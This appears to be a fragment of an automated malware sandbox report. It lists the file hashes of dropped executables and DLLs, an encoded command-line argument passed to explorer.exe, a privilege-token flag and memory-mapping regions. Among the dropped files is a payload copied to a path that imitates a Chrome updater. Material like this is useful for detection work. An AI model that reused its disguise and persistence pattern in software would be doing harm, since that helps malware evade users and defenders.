C:\Windows\explorer.exeC:\Windows\explorer.exe clcmeewnjgen0 Xji3FXYfqqI2timPThbgZueMNpSES88mLhMz2ywydJRha9S4YJkR8/KlqFio/vzAY7y//ZROYnArPXLiffwPBwfs6hsH6BZWYzKcgqh8/w5KES9i8iVGoln9YNKyIMIhchOv/qhVSSEyQVeeilGRs3EMCL7VVGCZZSNmGX+WhFkG6w6YtPhSONt0KQQX8lWBvZt8FTQet3u0ld4bcUsTw5fhWYnAMLoF2LOPPGYB2TrjMWdV62jpwHJofDnqBDBuWFMcEnGAyC28ts80L6HbzDjD0sBquAT4Mewl/rkK/eevnCIDRRDM/KANXpzBDbtzl320IoXjIb++yELBFh84SFIEF7L1qVd4YMHKeZwe807fKfwUBxVnRO7THuzKbYajHeg/I3SfaR6UzIZjCjwxfhgN5uZ2YUVYF2II6O4qeOY3s8Ab9cm7XC77uCy/Na4z1O1SfjGZbw/cD9kQ+XXgNvtDG6BognpyTqDH6/Yd56nhRN7gcoUiQQ2GwpUmVPUtKsvTrf3487LBbzei+Xrzzg==7⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\838029.exeFilesize
4.2MB
MD58268ff95b3aaea6d6de8f02a73c323d2
SHA1ae470145c4f5780315b52aa1c57ae0c04a2d18ca
SHA256529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8
SHA5129603dde1bfd9874637e63a268a7c8f85032892b4e58d3f96678dfbb52b453a972e00cd49077574e58726d3c5045788ede5a9b81c89a464342d5b64070c7325c0
-
C:\Users\Admin\AppData\Local\838029.exeFilesize
4.2MB
MD58268ff95b3aaea6d6de8f02a73c323d2
SHA1ae470145c4f5780315b52aa1c57ae0c04a2d18ca
SHA256529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8
SHA5129603dde1bfd9874637e63a268a7c8f85032892b4e58d3f96678dfbb52b453a972e00cd49077574e58726d3c5045788ede5a9b81c89a464342d5b64070c7325c0
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.logFilesize
443B
MD58add56521ef894ef0c66ecd3e989d718
SHA12058aa5185fd5dcce7263bef8fe35bf5e12dbc7f
SHA25601bcb6c8348b83208a7c923fd840130a0bc7b3a188b62ad8e270a296ed94b724
SHA512af99971664282617c18db6a27ddb3bf57eaa291d79ef66828319de3eb38533cc813f7d322cc4c9e687aa90b5c91b7874ed8e725c3cfe35e139e0581492caefb2
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5a8e8360d573a4ff072dcc6f09d992c88
SHA13446774433ceaf0b400073914facab11b98b6807
SHA256bf5e284e8f95122bf75ead61c7e2b40f55c96742b05330b5b1cb7915991df13b
SHA5124ee5167643d82082f57c42616007ef9be57f43f9731921bdf7bca611a914724ad94072d3c8f5b130fa54129e5328ccdebf37ba74339c37deb53e79df5cdf0dbe
-
C:\Users\Admin\AppData\Local\Temp\DotNetZip.dllFilesize
461KB
MD5a999d7f3807564cc816c16f862a60bbe
SHA11ee724daaf70c6b0083bf589674b6f6d8427544f
SHA2568e9c0362e9bfb3c49af59e1b4d376d3e85b13aed0fbc3f5c0e1ebc99c07345f3
SHA5126f1f73314d86ae324cc7f55d8e6352e90d4a47f0200671f7069daa98592daaceea34cf89b47defbecdda7d3b3e4682de70e80a5275567b82aa81b002958e4414
-
C:\Users\Admin\AppData\Local\Temp\DotNetZip.dllFilesize
461KB
MD5a999d7f3807564cc816c16f862a60bbe
SHA11ee724daaf70c6b0083bf589674b6f6d8427544f
SHA2568e9c0362e9bfb3c49af59e1b4d376d3e85b13aed0fbc3f5c0e1ebc99c07345f3
SHA5126f1f73314d86ae324cc7f55d8e6352e90d4a47f0200671f7069daa98592daaceea34cf89b47defbecdda7d3b3e4682de70e80a5275567b82aa81b002958e4414
-
C:\Users\Admin\AppData\Local\Temp\Newtonsoft.Json.dllFilesize
685KB
MD5081d9558bbb7adce142da153b2d5577a
SHA17d0ad03fbda1c24f883116b940717e596073ae96
SHA256b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3
SHA5122fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511
-
C:\Users\Admin\AppData\Local\Temp\Newtonsoft.Json.dllFilesize
685KB
MD5081d9558bbb7adce142da153b2d5577a
SHA17d0ad03fbda1c24f883116b940717e596073ae96
SHA256b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3
SHA5122fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511
-
C:\Users\Admin\AppData\Local\Temp\System.Data.SQLite.dllFilesize
384KB
MD555c797383dbbbfe93c0fe3215b99b8ec
SHA11b089157f3d8ae64c62ea15cdad3d82eafa1df4b
SHA2565fac5a9e9b8bbdad6cf661dbf3187e395914cd7139e34b725906efbb60122c0d
SHA512648a7da0bcda6ccd31b4d6cdc1c90c3bc3c11023fcceb569f1972b8f6ab8f92452d1a80205038edcf409669265b6756ba0da6b1a734bd1ae4b6c527bbebb8757
-
C:\Users\Admin\AppData\Local\Temp\System.Data.SQLite.dllFilesize
384KB
MD555c797383dbbbfe93c0fe3215b99b8ec
SHA11b089157f3d8ae64c62ea15cdad3d82eafa1df4b
SHA2565fac5a9e9b8bbdad6cf661dbf3187e395914cd7139e34b725906efbb60122c0d
SHA512648a7da0bcda6ccd31b4d6cdc1c90c3bc3c11023fcceb569f1972b8f6ab8f92452d1a80205038edcf409669265b6756ba0da6b1a734bd1ae4b6c527bbebb8757
-
C:\Users\Admin\AppData\Local\Temp\x86\SQLite.Interop.dllFilesize
1.3MB
MD58be215abf1f36aa3d23555a671e7e3be
SHA1547d59580b7843f90aaca238012a8a0c886330e6
SHA25683f332ea9535814f18be4ee768682ecc7720794aedc30659eb165e46257a7cae
SHA51238cf4aea676dacd2e719833ca504ac8751a5fe700214ff4ac2b77c0542928a6a1aa3780ed7418387affed67ab6be97f1439633249af22d62e075c1cdfdf5449b
-
C:\Users\Admin\AppData\Roaming\Chrome\updater.exeFilesize
4.2MB
MD58268ff95b3aaea6d6de8f02a73c323d2
SHA1ae470145c4f5780315b52aa1c57ae0c04a2d18ca
SHA256529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8
SHA5129603dde1bfd9874637e63a268a7c8f85032892b4e58d3f96678dfbb52b453a972e00cd49077574e58726d3c5045788ede5a9b81c89a464342d5b64070c7325c0
-
C:\Users\Admin\AppData\Roaming\Chrome\updater.exeFilesize
4.2MB
MD58268ff95b3aaea6d6de8f02a73c323d2
SHA1ae470145c4f5780315b52aa1c57ae0c04a2d18ca
SHA256529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8
SHA5129603dde1bfd9874637e63a268a7c8f85032892b4e58d3f96678dfbb52b453a972e00cd49077574e58726d3c5045788ede5a9b81c89a464342d5b64070c7325c0
-
memory/240-181-0x0000000000000000-mapping.dmp
-
memory/796-221-0x0000000000000000-mapping.dmp
-
memory/796-169-0x0000000000000000-mapping.dmp
-
memory/964-222-0x0000000000000000-mapping.dmp
-
memory/964-170-0x0000000000000000-mapping.dmp
-
memory/968-176-0x0000000000000000-mapping.dmp
-
memory/1100-207-0x0000000000000000-mapping.dmp
-
memory/1152-192-0x0000000000000000-mapping.dmp
-
memory/1180-194-0x0000000000000000-mapping.dmp
-
memory/1332-196-0x0000000000000000-mapping.dmp
-
memory/1392-209-0x0000000000000000-mapping.dmp
-
memory/1524-224-0x0000000000000000-mapping.dmp
-
memory/1560-189-0x0000000000000000-mapping.dmp
-
memory/1668-185-0x0000000000000000-mapping.dmp
-
memory/1936-153-0x0000000000000000-mapping.dmp
-
memory/1956-220-0x0000000000000000-mapping.dmp
-
memory/2036-167-0x0000000000000000-mapping.dmp
-
memory/2052-193-0x0000000000000000-mapping.dmp
-
memory/2060-158-0x0000000000000000-mapping.dmp
-
memory/2096-179-0x0000000000000000-mapping.dmp
-
memory/2132-159-0x0000000000000000-mapping.dmp
-
memory/2220-151-0x000002D6AE0A0000-0x000002D6AE4DE000-memory.dmpFilesize
4.2MB
-
memory/2220-152-0x00007FFCAEF00000-0x00007FFCAF9C1000-memory.dmpFilesize
10.8MB
-
memory/2284-217-0x0000000000000000-mapping.dmp
-
memory/2320-213-0x0000000000400000-0x0000000000417000-memory.dmpFilesize
92KB
-
memory/2320-216-0x0000000000400000-0x0000000000417000-memory.dmpFilesize
92KB
-
memory/2320-214-0x0000000000401BEA-mapping.dmp
-
memory/2320-165-0x0000000000000000-mapping.dmp
-
memory/2348-156-0x00007FFCAEF00000-0x00007FFCAF9C1000-memory.dmpFilesize
10.8MB
-
memory/2348-155-0x0000025A45F90000-0x0000025A45FB2000-memory.dmpFilesize
136KB
-
memory/2348-154-0x0000000000000000-mapping.dmp
-
memory/2420-190-0x0000000000000000-mapping.dmp
-
memory/2432-191-0x0000000000000000-mapping.dmp
-
memory/2512-187-0x0000000000000000-mapping.dmp
-
memory/2616-183-0x0000000000000000-mapping.dmp
-
memory/2664-180-0x0000000000000000-mapping.dmp
-
memory/2744-200-0x00007FFCB0A20000-0x00007FFCB14E1000-memory.dmpFilesize
10.8MB
-
memory/2744-218-0x0000015974EC0000-0x0000015974ED2000-memory.dmpFilesize
72KB
-
memory/2808-195-0x0000000000000000-mapping.dmp
-
memory/2892-144-0x000000000A060000-0x000000000A0C6000-memory.dmpFilesize
408KB
-
memory/2892-141-0x0000000008F30000-0x00000000090F2000-memory.dmpFilesize
1.8MB
-
memory/2892-143-0x0000000009270000-0x00000000092AC000-memory.dmpFilesize
240KB
-
memory/2892-140-0x0000000006C60000-0x0000000006CC2000-memory.dmpFilesize
392KB
-
memory/2892-130-0x0000000000BF0000-0x0000000000C28000-memory.dmpFilesize
224KB
-
memory/2892-147-0x000000000A150000-0x000000000A1CA000-memory.dmpFilesize
488KB
-
memory/2892-137-0x0000000006600000-0x0000000006622000-memory.dmpFilesize
136KB
-
memory/2892-136-0x00000000065B0000-0x0000000006600000-memory.dmpFilesize
320KB
-
memory/2892-135-0x0000000006B40000-0x0000000006BF0000-memory.dmpFilesize
704KB
-
memory/2892-132-0x0000000006D60000-0x0000000007304000-memory.dmpFilesize
5.6MB
-
memory/2892-131-0x0000000006120000-0x00000000061B2000-memory.dmpFilesize
584KB
-
memory/2948-211-0x0000000000000000-mapping.dmp
-
memory/3116-219-0x0000000000000000-mapping.dmp
-
memory/3260-202-0x0000000000000000-mapping.dmp
-
memory/3260-205-0x00007FFCB0A20000-0x00007FFCB14E1000-memory.dmpFilesize
10.8MB
-
memory/3316-227-0x0000000000000000-mapping.dmp
-
memory/3328-178-0x0000000000000000-mapping.dmp
-
memory/3408-168-0x0000000000000000-mapping.dmp
-
memory/3496-157-0x0000000000000000-mapping.dmp
-
memory/3500-223-0x0000000000000000-mapping.dmp
-
memory/3520-226-0x0000000000000000-mapping.dmp
-
memory/3564-182-0x0000000000000000-mapping.dmp
-
memory/3568-186-0x0000000000000000-mapping.dmp
-
memory/3620-201-0x0000000000000000-mapping.dmp
-
memory/3928-160-0x0000000000000000-mapping.dmp
-
memory/3964-175-0x0000000000000000-mapping.dmp
-
memory/4040-206-0x0000000000000000-mapping.dmp
-
memory/4104-163-0x0000000000000000-mapping.dmp
-
memory/4104-210-0x0000000000000000-mapping.dmp
-
memory/4220-148-0x0000000000000000-mapping.dmp
-
memory/4256-225-0x0000000000000000-mapping.dmp
-
memory/4388-177-0x0000000000000000-mapping.dmp
-
memory/4416-172-0x0000000000000000-mapping.dmp
-
memory/4440-212-0x0000000000000000-mapping.dmp
-
memory/4444-188-0x0000000000000000-mapping.dmp
-
memory/4588-184-0x0000000000000000-mapping.dmp
-
memory/4636-208-0x0000000000000000-mapping.dmp
-
memory/4692-161-0x0000000000000000-mapping.dmp
-
memory/4700-166-0x0000000000000000-mapping.dmp
-
memory/4776-162-0x0000000000000000-mapping.dmp
-
memory/4780-171-0x0000000000000000-mapping.dmp
-
memory/4884-164-0x0000000000000000-mapping.dmp
-
memory/4896-174-0x0000000000000000-mapping.dmp
-
memory/4984-173-0x0000000000000000-mapping.dmp
-
memory/4984-228-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/4984-230-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/4984-229-0x000000014036DAD4-mapping.dmp
-
memory/4984-231-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/4984-232-0x0000000000540000-0x0000000000560000-memory.dmpFilesize
128KB
-
memory/4984-233-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/4984-234-0x0000000002390000-0x00000000023D0000-memory.dmpFilesize
256KB